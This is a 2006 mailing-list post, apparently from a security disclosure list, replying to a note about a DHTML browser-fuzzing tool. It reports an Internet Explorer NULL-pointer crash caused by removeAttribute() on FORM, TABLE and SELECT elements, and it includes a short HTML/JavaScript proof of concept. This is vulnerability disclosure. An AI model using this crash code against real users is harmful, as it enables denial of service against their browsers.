Date: Thu Mar 23 07:40:01 2006
From: stelian.ene at gecadtech.com (Stelian Ene)
Subject: Fun with DHTML

H D Moore wrote:
> How bugs can you find in your browser? The recent IE issues only scratched
> the service of the DHTML/behavior bugs. The HTML/JS page below can be
> used to find all sorts of bugs in different browsers. I stopped caring
> about these after the first three invalid derefences.
>
> http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

Nice work !

On the IE front, besides the now known createTextRange() problem, no other high
risk behavior is observed.
However, you tool will uncover a *new, low risk IE vulnerability* (DoS). When
using the removeAttribute() method on certain HTML elements, a NULL pointer is
accessed, leading to a browser crash. The vulnerable elemets are FORM, TABLE,
and SELECT:

<select id='s'>

<script>
function nullptr(){
	a=document.getElementById('s').removeAttribute(0);
}
</script>